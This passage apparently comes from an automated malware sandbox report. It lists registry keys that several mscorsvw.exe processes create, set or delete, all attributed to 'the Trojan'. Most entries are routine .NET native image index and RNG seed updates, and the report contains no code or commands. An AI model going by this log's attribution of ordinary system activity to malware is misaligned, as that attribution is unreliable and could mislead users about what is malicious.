[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 CF CC 11 E2 5E DE 62 07 7E 61 0B 09 9F 21 19"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "94"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"LastModTime" = "20 36 83 96 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
The process mscorsvw.exe:2196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"MVID" = "F0 07 EE 1B F5 48 BA 76 1B A6 16 F4 C3 5B 15 8E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\168b424e\2b\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigString" = "ZAP--0000-0000"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"SIG" = "1D 3D FC F9 F8 82 BC 47 B7 60 1D 39 80 29 76 15"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 F9 BC 87 40 0C 00 F0 EE 6A 27 04 F2 CB A9 7B"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "92"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"LastModTime" = "9E 95 C3 96 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
The process mscorsvw.exe:3536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigMask" = "4361"
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"SIG" = "EC BB F6 79 DE 07 9A 4F A7 CE DF 48 D6 49 CE 93"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"LastModTime" = "02 DE 4D 97 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 64 A3 08 DC EE 1B 4B 3A FF 35 89 F1 B9 EB 8A"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "91"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"MVID" = "13 FC 3D AE F5 85 09 8F 11 91 1F 8F 72 AC 1C EA"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
The process mscorsvw.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 7B F3 64 DF C1 DF B9 B5 5A F2 24 B6 04 70 22"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"LastModTime" = "C0 88 DA 97 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"SIG" = "5D B3 1D FA D7 A3 2D 4A 9D D3 B0 41 D1 BC 36 E6"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"LastModTime" = "CC 4B 58 96 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MissingDependencies" = "Microsoft.BackgroundIntelligentTransfer.Management.Interop,6.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MVID" = "FD 3E DC DF A9 CE 60 AB AC 35 20 81 46 18 44 95"
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D D3 8E 75 48 34 76 5C 55 E2 86 D7 30 B4 AD 1E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "90"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"SIG" = "85 42 9C 0A C5 DF B1 48 A5 8E 44 2E FB 91 9D 84"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"Status" = "2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]
The process mscorsvw.exe:2544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 4B F8 7A D3 9B AE BE A2 05 D5 D9 9E CA 3F 04"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 8F 37 27 96 3F 58 8C 8A 66 AB 28 F1 64 BA ED"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ILDependencies" = "44 18 F2 39 EC CB 26 0B 6F 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "100"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigString" = "ZAP--0000-0000"
"MVID" = "9D 8E 8F 7B 7A E9 50 D8 65 44 54 05 97 83 7B 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"
"Status" = "0"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
The process mscorsvw.exe:1856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 37 36 B9 17 3F C5 C5 03 9F 66 0C 51 42 68 5B"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 8B 30 07 3E AE 3D 7B 09 B9 BB 33 22 A1 A9 7B"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 26 EA 13 7F 28 5B 7E B4 1B 1F 41 DC B0 94 73"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 3A 47 E4 D2 43 FE D1 F6 6F 1F D8 0C 90 B6 16"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The process mscorsvw.exe:2680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\643db07b\27\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
"ConfigMask" = "4361"
"MVID" = "93 92 67 97 48 6D 4F 7A 9B 69 C5 87 5F F3 FC 30"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ConfigString" = "ZAP--0000-0000"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"LastModTime" = "F2 7F EE 96 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\43970528\4b\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 0B EE 2E BC AD 96 06 46 3B 26 84 2A AB 5C 46"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"SIG" = "EF D0 54 19 D0 F5 86 44 A9 62 4E 86 6A 5F 6C 6E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "93"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
The process mscorsvw.exe:2872 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 8A D9 37 ED C9 37 10 A1 65 92 FB A0 EB DC 46"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
